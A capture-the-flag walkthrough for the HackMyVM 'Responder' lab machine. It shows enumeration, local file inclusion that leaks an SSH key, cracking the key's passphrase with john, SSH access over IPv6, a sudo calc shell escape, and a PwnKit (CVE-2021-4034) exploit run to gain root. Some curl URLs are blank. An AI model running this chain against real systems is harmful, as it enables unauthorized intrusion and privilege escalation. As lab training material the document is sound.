HackMyVm Responder Walkthrough


Scan ports, notice the port 22 is filtered.

 nmap -sV -sC -oN port.log
 Nmap scan report for darkmatter.hmv (
 Host is up (0.12s latency).
 Not shown: 998 closed tcp ports (conn-refused)
 22/tcp filtered ssh
 80/tcp open     http    Apache httpd 2.4.38 ((Debian))
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 |_http-server-header: Apache/2.4.38 (Debian)

Check port 80, only a simple page tells the current time.

 ~/D/responder $curl                                              
 your answer is in the answer.. it's
 and your time is running out..

Scan port 80, found filemanager.php. Scan threads can not be too big, I set it to 20.

 ~/D/responder $gobuster dir -u -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 401,403,404,500 --wildcard -o 80.log
 /index.php            (Status: 200) [Size: 73]
 /filemanager.php      (Status: 302) [Size: 0] [--> /]

Fuzz the param of filemanager.php, get random.

 ~/D/responder $wfuzz -u ""  -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 0
 ID           Response   Lines    Word       Chars       Payload                
 000003395:   302        27 L     39 W       1430 Ch     "random"

LFI worked, check passwd, get two user names.

 ~/D/responder $curl ""         

After enum some linux files, we can not get shell through log files. So check source code of filemanager.php, we get a ssh key.

 ~/D/responder $curl "
 code/resource=filemanager.php" |base64 -d                                                
     $filename = $_GET['random'];
 Proc-Type: 4,ENCRYPTED
 DEK-Info: DES-EDE3-CBC,411124D3C302D4F4

Decrypt the ssh key with john.

 ~/D/responder $/usr/share/john/ssh2john.py id_rsa > hash.txt                     
 ~/D/responder $john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt        
 Press 'q' or Ctrl-C to abort, almost any other key for status
 xxxxxx          (id_rsa)

Now we have the user name, ssh key and password to connect port 22, but port 22 is filtered. Maybe it can be connected through ipv6.

Check ipv6 address of the machine.

 ~/D/responder $ping6 -c2 -n -I eth1 ff02::1                                    
 ping6: Warning: source address might be selected on device other than: eth1
 PING ff02::1(ff02::1) from :: eth1: 56 data bytes
 64 bytes from fe80::a00:27ff:fec2:1426%eth1: icmp_seq=1 ttl=64 time=4.76 ms

Check port 22 with ipv6, yes, it's open.

 ~/D/responder $nmap -6 -p22 fe80::a00:27ff:fec2:1426%eth1    
 Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-05 08:59 CST
 Nmap scan report for fe80::a00:27ff:fec2:1426
 Host is up (0.0097s latency).
 22/tcp open  ssh

Log in ssh as user elliot.

 ~/D/responder $ssh elliot@fe80::a00:27ff:fec2:1426%eth1 -i id_rsa -6    
 Enter passphrase for key 'id_rsa':
 Linux responder 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 elliot@responder:~$ id
 uid=1001(elliot) gid=1001(elliot) groups=1001(elliot)

Check sudo -l.

 elliot@responder:~$ sudo -l
 sudo: unable to resolve host responder: Temporary failure in name resolution
 Matching Defaults entries for elliot on responder:
     env_reset, mail_badpass,
 User elliot may run the following commands on responder:
     (rohit) NOPASSWD: /usr/bin/calc

Run calc, enter help page, input "!/bin/bash" after ":".

 elliot@responder:~$ sudo -u rohit /usr/bin/calc
 sudo: unable to resolve host responder: Temporary failure in name resolution
 C-style arbitrary precision calculator (version
 Calc is open software. For license details type:  help copyright
 [Type "exit" to exit, or "help" for help.]
 ; help
 For more information while running calc, type  help  followed by one of the
 following topics:
     topic               description
     -----               -----------
     intro               introduction to calc
     overview            overview of calc
     help                this file
 rohit@responder:/home/elliot$ id
 uid=1002(rohit) gid=1002(rohit) groups=1002(rohit)

Check SUID files, notice polkit.

 elliot@responder:~$ find / -perm -u=s 2>/dev/null

Use the lastest CVE of polkit to get root.

 elliot@responder:/tmp$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
 elliot@responder:/tmp$ ./cve-2021-4034-poc
 # id
 uid=0(root) gid=0(root) groups=0(root),1001(elliot)



Powered By Z-BlogPHP 1.7.2